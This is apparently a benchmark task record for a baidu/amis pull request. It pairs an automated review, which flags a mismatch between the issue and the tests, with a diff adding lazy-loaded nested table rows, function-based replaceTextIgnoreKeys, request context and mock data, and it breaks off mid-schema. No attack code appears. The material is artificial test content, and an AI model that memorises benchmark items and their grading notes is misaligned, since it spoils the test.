{ "num_modified_files": 8, "num_modified_lines": 98, "pr_author": "2betop", "pr_labels": [ "feat" ], "llm_metadata": { "code": "B5", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": true, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/baidu/amis/pull/8510/files?diff=unified&w=0#diff-cecdf20aaa84e6464093def72aee232955ad9649b13e7187284dfb7176b3cdacL757-R757", "https://github.com/baidu/amis/pull/8510/files?diff=unified&w=0#diff-cecdf20aaa84e6464093def72aee232955ad9649b13e7187284dfb7176b3cdacR776-R798", "https://github.com/baidu/amis/pull/8510/files?diff=unified&w=0#diff-62f2e14b837dfa7b7f5f94ee2a856825f211639ddf0f85d783c666dbcd7f8d0dL123-R123", "https://github.com/baidu/amis/pull/8510/files?diff=unified&w=0#diff-53fb1a4945d62b6335fc247673d64a59fee08926d3470647d0695b8e66c0cef2L10-R10", "https://github.com/baidu/amis/pull/8510/files?diff=unified&w=0#diff-53fb1a4945d62b6335fc247673d64a59fee08926d3470647d0695b8e66c0cef2L17-R32" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat", "documentation_enh" ], "reason": null, "reasoning": "The issue requests adding function support to replaceTextIgnoreKeys and updating docs. The provided test patch, however, adds many unrelated changes (formula lexer/filter handling, UI tooltip attribute removal, parser imports) that are not described in the issue, indicating missing acceptance criteria and extraneous patch artifacts. 
These misalignments point to an environment preparation problem rather than a clean, solvable task.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "evaluate test adds special character handling not mentioned in the issue", "lexer test modifies filter options and adds isFilter logic unrelated to replaceTextIgnoreKeys", "parser test imports moment and adds filter handling not described", "UI snapshot changes remove data‑tooltip attributes, which are unrelated to the feature" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
1bb988b942739d3f674260f578a69be4dfe659b9
2023-10-26 11:26:59
baidu__amis-8515
diff --git a/docs/zh-CN/components/crud.md b/docs/zh-CN/components/crud.md index d6b2561da..b6ab5a436 100755 --- a/docs/zh-CN/components/crud.md +++ b/docs/zh-CN/components/crud.md @@ -200,11 +200,11 @@ CRUD 组件对数据源接口的数据结构要求如下: | orderDir | 'asc'/'desc' | 排序方式 | | keywords | string | 搜索关键字 | -### 解析Query原始类型 +### 解析 Query 原始类型 > `3.5.0`及以上版本 -`syncLocation`开启后,CRUD在初始化数据域时,将会对url中的Query进行转换,将原始类型的字符串格式的转化为同位类型,目前仅支持**布尔类型** +`syncLocation`开启后,CRUD 在初始化数据域时,将会对 url 中的 Query 进行转换,将原始类型的字符串格式的转化为同位类型,目前仅支持**布尔类型** ``` "true" ==> true @@ -213,7 +213,6 @@ CRUD 组件对数据源接口的数据结构要求如下: 如果只想保持字符串格式,可以设置`"parsePrimitiveQuery": false`关闭该特性,具体效果参考[示例](../../../examples/crud/parse-primitive-query)。 - ## 功能 既然这个渲染器叫增删改查,那接下来分开介绍这几个功能吧。 @@ -584,6 +583,61 @@ Cards 模式支持 [Cards](./cards) 中的所有功能。 } ``` +## 嵌套 + +当行数据中存在 `children` 字段时,CRUD 会自动识别为树形数据,并支持展开收起。 + +```schema: scope="body" +{ + "type": "crud", + "name": "crud", + "syncLocation": false, + "api": "/api/mock2/crud/table2", + "columns": [ + { + "name": "id", + "label": "ID" + }, + { + "name": "engine", + "label": "Rendering engine" + }, + { + "name": "browser", + "label": "Browser" + } + ] +} +``` + +## 嵌套懒加载 + +如果数据量比较大不适合一次性加载,可以配置 `deferApi` 接口,结合行数据中标记 `defer: true` 属性,实现懒加载。 + +```schema: scope="body" +{ + "type": "crud", + "name": "crud", + "syncLocation": false, + "api": "/api/mock2/crud/table6", + "deferApi": "/api/mock2/crud/table6?parentId=${id}", + "columns": [ + { + "name": "id", + "label": "ID" + }, + { + "name": "engine", + "label": "Rendering engine" + }, + { + "name": "browser", + "label": "Browser" + } + ] +} +``` + ## 查询条件表单 大部分表格展示有对数据进行检索的需求,CRUD 自身支持通过配置`filter`,实现查询条件过滤表单。`filter` 配置实际上同 [Form](./form/index) 组件,因此支持绝大部分`form`的功能。 @@ -3173,6 +3227,7 @@ itemAction 里的 onClick 还能通过 `data` 参数拿到当前行的数据, | title | `string` | `""` | 可设置成空,当设置成空时,没有标题栏 | | className | `string` | | 表格外层 Dom 的类名 | | api | [API](../../docs/types/api) | | CRUD 用来获取列表数据的 api。 | +| deferApi | [API](../../docs/types/api) | | 当行数据中有 defer 
属性时,用此接口进一步加载内容 | | loadDataOnce | `boolean` | | 是否一次性加载所有数据(前端分页) | | loadDataOnceFetchOnFilter | `boolean` | `true` | 在开启 loadDataOnce 时,filter 时是否去重新请求 api | | source | `string` | | 数据映射接口返回某字段的值,不设置会默认使用接口返回的`${items}`或者`${rows}`,也可以设置成上层数据源的内容 | diff --git a/docs/zh-CN/components/table.md b/docs/zh-CN/components/table.md index 0efccd914..1667515df 100755 --- a/docs/zh-CN/components/table.md +++ b/docs/zh-CN/components/table.md @@ -1825,6 +1825,7 @@ popOver 的其它配置请参考 [popover](./popover) | type | `string` | | `"type"` 指定为 table 渲染器 | | | title | `string` | | 标题 | | | source | `string` | `${items}` | 数据源, 绑定当前环境变量 | | +| deferApi | [API](../../docs/types/api) | | 当行数据中有 defer 属性时,用此接口进一步加载内容 | | affixHeader | `boolean` | `true` | 是否固定表头 | | | columnsTogglable | `auto` 或者 `boolean` | `auto` | 展示列显示开关, 自动即:列数量大于或等于 5 个时自动开启 | | | placeholder | `string` 或者 `SchemaTpl` | `暂无数据` | 当没数据的时候的文字提示 | | diff --git a/docs/zh-CN/start/getting-started.md b/docs/zh-CN/start/getting-started.md index 6d5d21414..9fac584e3 100644 --- a/docs/zh-CN/start/getting-started.md +++ b/docs/zh-CN/start/getting-started.md @@ -157,6 +157,7 @@ let amisScoped = amis.embed( // requestAdaptor(api) { // // 支持异步,可以通过 api.mockResponse 来设置返回结果,跳过真正的请求发送 // // 此功能自定义 fetcher 的话会失效 + // // api.context 中包含发送请求前的上下文信息 // return api; // } // @@ -758,8 +759,7 @@ let amisScoped = amis.embed( { replaceText: { service: 'http://localhost' - }, - replaceTextKeys: ['api'] + } } ); ``` @@ -778,6 +778,29 @@ type, name, mode, target, reload 如果发现有字段被意外替换了,可以通过设置这个属性来避免 +通过字符串数组或者函数来过滤字段,比如: + +```javascript +let amisScoped = amis.embed( + '#root', + { + type: 'page', + body: { + type: 'service', + api: 'service/api' + } + }, + {}, + { + replaceText: { + service: 'http://localhost' + }, + // replaceTextIgnoreKeys: ['api'], + replaceTextIgnoreKeys: key => key === 'api' + } +); +``` + #### toastPosition Toast 提示弹出位置,默认为`'top-center'`。 diff --git a/docs/zh-CN/types/api.md b/docs/zh-CN/types/api.md index 
de89f2ecf..e806d3fa8 100755 --- a/docs/zh-CN/types/api.md +++ b/docs/zh-CN/types/api.md @@ -591,6 +591,7 @@ amis 的 API 配置,如果无法配置出你想要的请求结构,那么可 - method:当前请求的方式 - data:请求的数据体 - headers:请求的头部信息 + - context: 发送请求时的上下文数据 - **context** 发送请求时的上下文数据 ##### 字符串形式 diff --git a/examples/components/CRUD/Nested.jsx b/examples/components/CRUD/Nested.jsx index 3cbbb96c1..83f40fdf2 100644 --- a/examples/components/CRUD/Nested.jsx +++ b/examples/components/CRUD/Nested.jsx @@ -2,11 +2,9 @@ export default { title: '支持多层嵌套,列数据中有 children 字段即可。(建议不超过10层)', body: { type: 'crud', - api: '/api/mock2/crud/table2', + api: '/api/mock2/crud/table6', + deferApi: '/api/mock2/crud/table6?parentId=${id}', saveOrderApi: '/api/mock2/form/saveData', - expandConfig: { - expand: 'all' - }, draggable: true, columns: [ { diff --git a/mock/cfc/mock/crud/table6.js b/mock/cfc/mock/crud/table6.js new file mode 100644 index 000000000..ed198eddf --- /dev/null +++ b/mock/cfc/mock/crud/table6.js @@ -0,0 +1,527 @@ +function findInTree(tree, id) { + let ret = null; + tree.some(function (item) { + if (item.id == id) { + ret = item; + return true; + } + if (item.children) { + ret = findInTree(item.children, id); + return !!ret; + } + }); + return ret; +} + +module.exports = function (req, res) { + const perPage = 10; + const page = req.query.page || 1; + let items = data.concat(); + if (req.query.parentId) { + const item = findInTree(items, req.query.parentId); + + if (!item) { + res.json({ + status: 404, + msg: 'Not Found' + }); + return; + } + + res.json({ + status: 0, + msg: 'ok', + data: { + ...item, + children: Array.isArray(item.children) + ? 
item.children.map(item => ({ + ...item, + children: undefined, + defer: !!(Array.isArray(item.children) && item.children.length) + })) + : [] + } + }); + return; + } + const ret = { + status: 0, + msg: 'ok', + data: { + count: items.length, + rows: items + .concat() + .splice((page - 1) * perPage, perPage) + .map(item => ({ + ...item, + children: undefined, + defer: !!(Array.isArray(item.children) && item.children.length) + })) + } + }; + res.json(ret); +}; + +module.exports.cache = true; +const data = [ + { + engine: 'Trident', + browser: 'Internet Explorer 4.0', + platform: 'Win 95+', + version: '4', + grade: 'X' + }, + { + engine: 'Trident', + browser: 'Internet Explorer 5.0', + platform: 'Win 95+', + version: '5', + grade: 'C' + }, + { + engine: 'Trident', + browser: 'Internet Explorer 5.5', + platform: 'Win 95+', + version: '5.5', + grade: 'A' + }, + { + engine: 'Trident', + browser: 'Internet Explorer 6', + platform: 'Win 98+', + version: '6', + grade: 'A' + }, + { + engine: 'Trident', + browser: 'Internet Explorer 7', + platform: 'Win XP SP2+', + version: '7', + grade: 'A' + }, + { + engine: 'Trident', + browser: 'AOL browser (AOL desktop)', + platform: 'Win XP', + version: '6', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Firefox 1.0', + platform: 'Win 98+ / OSX.2+', + version: '1.7', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Firefox 1.5', + platform: 'Win 98+ / OSX.2+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Firefox 2.0', + platform: 'Win 98+ / OSX.2+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Firefox 3.0', + platform: 'Win 2k+ / OSX.3+', + version: '1.9', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Camino 1.0', + platform: 'OSX.2+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Camino 1.5', + platform: 'OSX.3+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Netscape 7.2', + platform: 'Win 95+ / Mac OS 8.6-9.2', + 
version: '1.7', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Netscape Browser 8', + platform: 'Win 98SE+', + version: '1.7', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Netscape Navigator 9', + platform: 'Win 98+ / OSX.2+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.0', + platform: 'Win 95+ / OSX.1+', + version: '1', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.1', + platform: 'Win 95+ / OSX.1+', + version: '1.1', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.2', + platform: 'Win 95+ / OSX.1+', + version: '1.2', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.3', + platform: 'Win 95+ / OSX.1+', + version: '1.3', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.4', + platform: 'Win 95+ / OSX.1+', + version: '1.4', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.5', + platform: 'Win 95+ / OSX.1+', + version: '1.5', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.6', + platform: 'Win 95+ / OSX.1+', + version: '1.6', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.7', + platform: 'Win 98+ / OSX.1+', + version: '1.7', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Mozilla 1.8', + platform: 'Win 98+ / OSX.1+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Seamonkey 1.1', + platform: 'Win 98+ / OSX.2+', + version: '1.8', + grade: 'A' + }, + { + engine: 'Gecko', + browser: 'Epiphany 2.20', + platform: 'Gnome', + version: '1.8', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'Safari 1.2', + platform: 'OSX.3', + version: '125.5', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'Safari 1.3', + platform: 'OSX.3', + version: '312.8', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'Safari 2.0', + platform: 'OSX.4+', + version: '419.3', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'Safari 3.0', + platform: 'OSX.4+', + version: '522.1', + grade: 'A' + }, + { + 
engine: 'Webkit', + browser: 'OmniWeb 5.5', + platform: 'OSX.4+', + version: '420', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'iPod Touch / iPhone', + platform: 'iPod', + version: '420.1', + grade: 'A' + }, + { + engine: 'Webkit', + browser: 'S60', + platform: 'S60', + version: '413', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 7.0', + platform: 'Win 95+ / OSX.1+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 7.5', + platform: 'Win 95+ / OSX.2+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 8.0', + platform: 'Win 95+ / OSX.2+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 8.5', + platform: 'Win 95+ / OSX.2+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 9.0', + platform: 'Win 95+ / OSX.3+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 9.2', + platform: 'Win 88+ / OSX.3+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera 9.5', + platform: 'Win 88+ / OSX.3+', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Opera for Wii', + platform: 'Wii', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Nokia N800', + platform: 'N800', + version: '-', + grade: 'A' + }, + { + engine: 'Presto', + browser: 'Nintendo DS browser', + platform: 'Nintendo DS', + version: '8.5', + grade: 'C' + }, + { + engine: 'KHTML', + browser: 'Konqureror 3.1', + platform: 'KDE 3.1', + version: '3.1', + grade: 'C' + }, + { + engine: 'KHTML', + browser: 'Konqureror 3.3', + platform: 'KDE 3.3', + version: '3.3', + grade: 'A' + }, + { + engine: 'KHTML', + browser: 'Konqureror 3.5', + platform: 'KDE 3.5', + version: '3.5', + grade: 'A' + }, + { + engine: 'Tasman', + browser: 'Internet Explorer 4.5', + platform: 'Mac OS 8-9', + version: '-', + grade: 'X' + }, + { + engine: 'Tasman', + browser: 'Internet Explorer 5.1', + platform: 'Mac OS 7.6-9', + version: '1', 
+ grade: 'C' + }, + { + engine: 'Tasman', + browser: 'Internet Explorer 5.2', + platform: 'Mac OS 8-X', + version: '1', + grade: 'C' + }, + { + engine: 'Misc', + browser: 'NetFront 3.1', + platform: 'Embedded devices', + version: '-', + grade: 'C' + }, + { + engine: 'Misc', + browser: 'NetFront 3.4', + platform: 'Embedded devices', + version: '-', + grade: 'A' + }, + { + engine: 'Misc', + browser: 'Dillo 0.8', + platform: 'Embedded devices', + version: '-', + grade: 'X' + }, + { + engine: 'Misc', + browser: 'Links', + platform: 'Text only', + version: '-', + grade: 'X' + }, + { + engine: 'Misc', + browser: 'Lynx', + platform: 'Text only', + version: '-', + grade: 'X' + }, + { + engine: 'Misc', + browser: 'IE Mobile', + platform: 'Windows Mobile 6', + version: '-', + grade: 'C' + }, + { + engine: 'Misc', + browser: 'PSP browser', + platform: 'PSP', + version: '-', + grade: 'C' + }, + { + engine: 'Other browsers', + browser: 'All others', + platform: '-', + version: '-', + grade: 'U' + } +].map(function (item, index) { + return Object.assign({}, item, { + id: index + 1, + children: + Math.random() > 0.5 + ? 
undefined + : [ + { + engine: 'Trident', + browser: 'Internet Explorer 4.0', + platform: 'Win 95+', + version: '4', + grade: 'X' + }, + { + engine: 'Trident', + browser: 'Internet Explorer 5.0', + platform: 'Win 95+', + version: '5', + grade: 'C' + }, + { + engine: 'Other browsers', + browser: 'All others', + platform: '-', + version: '-', + grade: 'U' + } + ].map(function (child, i) { + return Object.assign({}, child, { + id: (index + 1) * 100 + i + 1, + children: [ + { + engine: 'Trident', + browser: 'Internet Explorer 4.0', + platform: 'Win 95+', + version: '4', + grade: 'X' + }, + { + engine: 'Misc', + browser: 'Internet Explorer 5.0', + platform: 'Win 95+', + version: '5', + grade: 'C' + }, + { + engine: 'Misc', + browser: 'Internet Explorer 5.0', + platform: 'Win 95+', + version: '1', + grade: 'A' + } + ].map(function (child, i) { + return Object.assign({}, child, { + id: (i + 1) * 100 + (index + 1) * 1000 + i + 1 + }); + }) + }); + }) + }); +}); diff --git a/mock/cfc/mock/index.js b/mock/cfc/mock/index.js index a73d865ce..9b8fe1c3d 100755 --- a/mock/cfc/mock/index.js +++ b/mock/cfc/mock/index.js @@ -27,15 +27,20 @@ module.exports = function (req, res) { return require(file)(req, res); } else if (exist(jsFile)) { let file = require.resolve(path.join(DIRNAME, jsFile)); - delete require.cache[file]; + let mod = require(file); + + if (!mod.cache) { + delete require.cache[file]; + mod = require(file); + } if (req.query.waitSeconds) { return setTimeout(function () { - require(file)(req, res); + mod(req, res); }, parseInt(req.query.waitSeconds, 10) * 1000); } - return require(file)(req, res); + return mod(req, res); } if (exist(jsonFile)) { if (req.query.waitSeconds) { diff --git a/packages/amis-core/package.json b/packages/amis-core/package.json index a5b5d4ca5..e8834b56e 100644 --- a/packages/amis-core/package.json +++ b/packages/amis-core/package.json @@ -61,7 +61,8 @@ "react-intersection-observer": "9.5.2", "react-json-view": "1.21.3", "tslib": "^2.3.1", - 
"uncontrollable": "7.2.1" + "uncontrollable": "7.2.1", + "path-to-regexp": "6.2.0" }, "peerDependencies": { "amis-formula": "*", diff --git a/packages/amis-core/src/env.tsx b/packages/amis-core/src/env.tsx index e63b9c289..830f41098 100644 --- a/packages/amis-core/src/env.tsx +++ b/packages/amis-core/src/env.tsx @@ -131,7 +131,9 @@ export interface RendererEnv { /** * 文本替换的黑名单,因为属性太多了所以改成黑名单的 flags */ - replaceTextIgnoreKeys?: String[]; + replaceTextIgnoreKeys?: + | String[] + | ((key: string, value: any, object: any) => boolean); /** * 解析url参数 diff --git a/packages/amis-core/src/store/table.ts b/packages/amis-core/src/store/table.ts index e1f3db6a3..42b354875 100644 --- a/packages/amis-core/src/store/table.ts +++ b/packages/amis-core/src/store/table.ts @@ -39,6 +39,45 @@ import {getStoreById} from './manager'; */ const PARTITION_INDEX = 3; +function initChildren( + children: Array<any>, + depth: number, + pindex: number, + parentId: string, + path: string = '' +): any { + depth += 1; + return children.map((item, index) => { + item = isObject(item) + ? item + : { + item + }; + const id = item.__id ?? guid(); + + return { + // id: String(item && (item as any)[self.primaryField] || `${pindex}-${depth}-${key}`), + id: String(id), + parentId: String(parentId), + key: String(`${pindex}-${depth}-${index}`), + path: `${path}${index}`, + depth: depth, + index: index, + newIndex: index, + pristine: item, + data: item, + defer: !!item.defer, + loaded: false, + loading: false, + rowSpans: {}, + children: + item && Array.isArray(item.children) + ? 
initChildren(item.children, depth, index, id, `${path}${index}.`) + : [] + }; + }); +} + export const Column = types .model('Column', { label: types.optional(types.frozen(), undefined), @@ -127,20 +166,33 @@ export const Row = types rowSpans: types.frozen({} as any), index: types.number, newIndex: types.number, - nth: 0, path: '', // 行数据的位置 - expandable: false, checkdisable: false, isHover: false, children: types.optional( types.array(types.late((): IAnyModelType => Row)), [] ), + defer: false, // 是否为懒数据 + loaded: false, // 懒数据是否加载完了 + loading: false, // 懒数据是否正在加载 + error: '', // 懒数据加载失败的错误信息 depth: types.number, // 当前children位于第几层,便于使用getParent获取最顶层TableStore appeared: true, lazyRender: false }) .views(self => ({ + get expandable(): boolean { + let table: any; + return !!( + (self && self.children.length) || + (self && self.defer && !self.loaded) || + ((table = getParent(self, self.depth * 2) as any) && + table.footable && + table.footableColumns.length) + ); + }, + get checked(): boolean { return (getParent(self, self.depth * 2) as ITableStore).isSelected( self as IRow @@ -320,36 +372,70 @@ export const Row = types }); if (Array.isArray(data.children)) { - const arr = data.children; - const pool = arr.concat(); + this.replaceChildren(data.children); + } + }, - // 把多的删了先 - if (self.children.length > arr.length) { - self.children.splice(arr.length, self.children.length - arr.length); - } + replaceChildren(children: Array<any>) { + const arr = children; + const pool = arr.concat(); - let index = 0; - const len = self.children.length; - while (pool.length) { - // 因为父级id未更新,所以需要将子级的parentId正确指向父级id - const item = { - ...pool.shift(), - parentId: self.id - }!; - - if (index < len) { - self.children[index].replaceWith(item); - } else { - const row = Row.create(item); - self.children.push(row); - } - index++; + // 把多的删了先 + if (self.children.length > arr.length) { + self.children.splice(arr.length, self.children.length - arr.length); + } + + let index = 0; + const len = 
self.children.length; + while (pool.length) { + // 因为父级id未更新,所以需要将子级的parentId正确指向父级id + const item = { + ...pool.shift(), + parentId: self.id + }!; + + if (index < len) { + self.children[index].replaceWith(item); + } else { + const row = Row.create(item); + self.children.push(row); } + index++; } }, markAppeared(value: any) { value && (self.appeared = !!value); + }, + + markLoading(value: any) { + self.loading = !!value; + }, + + markLoaded(value: any) { + self.loaded = !!value; + }, + + setError(value: any) { + self.error = String(value); + }, + + resetDefered() { + self.error = ''; + self.loaded = false; + }, + + setDeferData({children, ...rest}: any) { + self.data = { + ...self.data, + ...rest + }; + + if (Array.isArray(children)) { + this.replaceChildren( + initChildren(children, self.depth, self.index, self.id, self.path) + ); + } } })); @@ -1238,55 +1324,6 @@ export const TableStore = iRendererStore return combineCell(arr, keys); } - function initChildren( - children: Array<any>, - depth: number, - pindex: number, - parentId: string, - path: string = '', - nThRef: {index: number} - ): any { - depth += 1; - return children.map((item, index) => { - item = isObject(item) - ? item - : { - item - }; - const id = item.__id ?? guid(); - - return { - // id: String(item && (item as any)[self.primaryField] || `${pindex}-${depth}-${key}`), - id: String(id), - parentId: String(parentId), - key: String(`${pindex}-${depth}-${index}`), - path: `${path}${index}`, - depth: depth, - index: index, - nth: nThRef.index++, - newIndex: index, - pristine: item, - data: item, - rowSpans: {}, - children: - item && Array.isArray(item.children) - ? 
initChildren( - item.children, - depth, - index, - id, - `${path}${index}.`, - nThRef - ) - : [], - expandable: !!( - (item && Array.isArray(item.children) && item.children.length) || - (self.footable && self.footableColumns.length) - ) - }; - }); - } - function initRows( rows: Array<any>, getEntryId?: (entry: any, index: number) => string, @@ -1298,7 +1335,6 @@ export const TableStore = iRendererStore /* 避免输入内容为非数组挂掉 */ rows = !Array.isArray(rows) ? [] : rows; - const nThRef = {index: 0}; let arr: Array<SRow> = rows.map((item, index) => { if (!isObject(item)) { item = { @@ -1315,20 +1351,18 @@ export const TableStore = iRendererStore key: String(`${index}-1-${index}`), depth: 1, // 最大父节点默认为第一层,逐层叠加 index: index, - nth: nThRef.index++, newIndex: index, pristine: item, path: `${index}`, data: item, rowSpans: {}, + defer: !!item.defer, + loaded: false, + loading: false, children: item && Array.isArray(item.children) - ? initChildren(item.children, 1, index, id, `${index}.`, nThRef) - : [], - expandable: !!( - (item && Array.isArray(item.children) && item.children.length) || - (self.footable && self.footableColumns.length) - ) + ? 
initChildren(item.children, 1, index, id, `${index}.`) + : [] }; }); @@ -1342,7 +1376,9 @@ export const TableStore = iRendererStore } replaceRow(arr, reUseRow); - self.isNested = self.rows.some(item => item.children.length); + self.isNested = self.rows.some( + item => item.children.length || (item.defer && !item.loaded) + ); // 前 20 个直接渲染,后面的按需渲染 if ( diff --git a/packages/amis-core/src/types.ts b/packages/amis-core/src/types.ts index 0133ae7d9..683a4406c 100644 --- a/packages/amis-core/src/types.ts +++ b/packages/amis-core/src/types.ts @@ -228,6 +228,11 @@ export interface ApiObject extends BaseApiObject { api: ApiObject, context: any ) => ApiObject | Promise<ApiObject>; + /** + * api 发送上下文,可以用来传递一些数据给 api 的 adaptor + * @readonly + */ + context?: any; /** 是否过滤为空字符串的 query 参数 */ filterEmptyQuery?: boolean; downloadFileName?: string; diff --git a/packages/amis-core/src/utils/api.ts b/packages/amis-core/src/utils/api.ts index bfea52cc4..e3f7004b8 100644 --- a/packages/amis-core/src/utils/api.ts +++ b/packages/amis-core/src/utils/api.ts @@ -478,6 +478,7 @@ export function wrapFetcher( options?: object ) { api = buildApi(api, data, options) as ApiObject; + (api as ApiObject).context = data; if (api.requestAdaptor) { debug('api', 'before requestAdaptor', api); diff --git a/packages/amis-core/src/utils/replaceText.ts b/packages/amis-core/src/utils/replaceText.ts index 42c3e6925..2b5c630c2 100644 --- a/packages/amis-core/src/utils/replaceText.ts +++ b/packages/amis-core/src/utils/replaceText.ts @@ -7,20 +7,31 @@ import {isObject, JSONTraverse} from './helper'; export function replaceText( schema: any, replaceText?: {[propName: string]: string}, - replaceTextIgnoreKeys?: String[] + replaceTextIgnoreKeys?: + | String[] + | ((key: string, value: any, object: any) => boolean) ) { // 进行文本替换 if (replaceText && isObject(replaceText)) { let replicaSchema = cloneDeep(schema); const replaceKeys = Object.keys(replaceText); replaceKeys.sort((a, b) => b.length - a.length); // 
避免用户将短的放前面 - const IgnoreKeys = new Set(replaceTextIgnoreKeys || []); + const IgnoreKeys = new Set( + Array.isArray(replaceTextIgnoreKeys) ? replaceTextIgnoreKeys : [] + ); + const ignore = + typeof replaceTextIgnoreKeys === 'function' + ? replaceTextIgnoreKeys + : (key: string) => { + return IgnoreKeys.has(key); + }; + JSONTraverse(replicaSchema, (value: any, key: string, object: any) => { const descriptor = Object.getOwnPropertyDescriptor(object, key); if ( typeof value === 'string' && - !IgnoreKeys.has(key) && - descriptor?.writable + descriptor?.writable && + !ignore(key, value, object) ) { for (const replaceKey of replaceKeys) { if (~value.indexOf(replaceKey)) { diff --git a/packages/amis-core/src/utils/style-helper.ts b/packages/amis-core/src/utils/style-helper.ts index 10969f1b1..476171f7c 100644 --- a/packages/amis-core/src/utils/style-helper.ts +++ b/packages/amis-core/src/utils/style-helper.ts @@ -56,7 +56,7 @@ export function findOrCreateStyle(id: string, doc?: Document) { } export function insertStyle(style: string, id: string, doc?: Document) { - const varStyleTag = findOrCreateStyle(id, doc); + const varStyleTag = findOrCreateStyle('amis-' + id, doc); // bca-disable-line varStyleTag.innerHTML = style; @@ -348,7 +348,7 @@ export interface InsertCustomStyle { */ export function removeCustomStyle(type: string, id: string, doc?: Document) { const style = (doc || document).getElementById( - (type ? type + '-' : '') + id.replace('u:', '') + 'amis-' + (type ? type + '-' : '') + id.replace('u:', '') ); if (style) { style.remove(); diff --git a/packages/amis-editor/src/component/BaseControl.ts b/packages/amis-editor/src/component/BaseControl.ts index 2044e7eb2..db58792de 100644 --- a/packages/amis-editor/src/component/BaseControl.ts +++ b/packages/amis-editor/src/component/BaseControl.ts @@ -253,6 +253,7 @@ export const formItemControl: ( key: 'status', body: normalizeBodySchema( [ + getSchemaTpl('visible'), getSchemaTpl('hidden'), supportStatic ? 
getSchemaTpl('static') : null, // TODO: 下面的部分表单项才有,是不是判断一下是否是表单项 diff --git a/packages/amis-editor/src/plugin/Form/Form.tsx b/packages/amis-editor/src/plugin/Form/Form.tsx index 1c8e0d49e..ddf531ec2 100644 --- a/packages/amis-editor/src/plugin/Form/Form.tsx +++ b/packages/amis-editor/src/plugin/Form/Form.tsx @@ -1,7 +1,7 @@ import cx from 'classnames'; import flatten from 'lodash/flatten'; import cloneDeep from 'lodash/cloneDeep'; -import {isObject} from 'amis-core'; +import {isObject, getRendererByName} from 'amis-core'; import { BasePlugin, tipedLabel, @@ -783,29 +783,61 @@ export class FormPlugin extends BasePlugin { '设置后将让表单的第一个可输入的表单项获得焦点' ) }), - { - type: 'ae-switch-more', - mode: 'normal', + getSchemaTpl('switch', { name: 'persistData', label: tipedLabel( '本地缓存', '开启后,表单的数据会缓存在浏览器中,切换页面或关闭弹框不会清空当前表单内的数据' ), - hiddenOnDefault: true, - formType: 'extend', - form: { - body: [ - getSchemaTpl('switch', { - name: 'clearPersistDataAfterSubmit', - label: tipedLabel( - '提交成功后清空缓存', - '开启本地缓存并开启本配置项后,表单提交成功后,会自动清除浏览器中当前表单的缓存数据' - ), - pipeIn: defaultValue(false), - visibleOn: 'data.persistData' - }) - ] - } + pipeIn: (value: boolean | string | undefined) => !!value + }), + { + type: 'container', + className: 'ae-ExtendMore mb-3', + visibleOn: 'data.persistData', + body: [ + getSchemaTpl('tplFormulaControl', { + name: 'persistData', + label: tipedLabel( + '持久化Key', + '使用静态数据或者变量:<code>"\\${id}"</code>,来为Form指定唯一的Key' + ), + pipeIn: (value: boolean | string | undefined) => + typeof value === 'string' ? value : '' + }), + { + type: 'input-array', + label: tipedLabel( + '保留字段集合', + '如果只需要保存Form中的部分字段值,请配置需要保存的字段名称集合,留空则保留全部字段' + ), + name: 'persistDataKeys', + items: { + type: 'input-text', + placeholder: 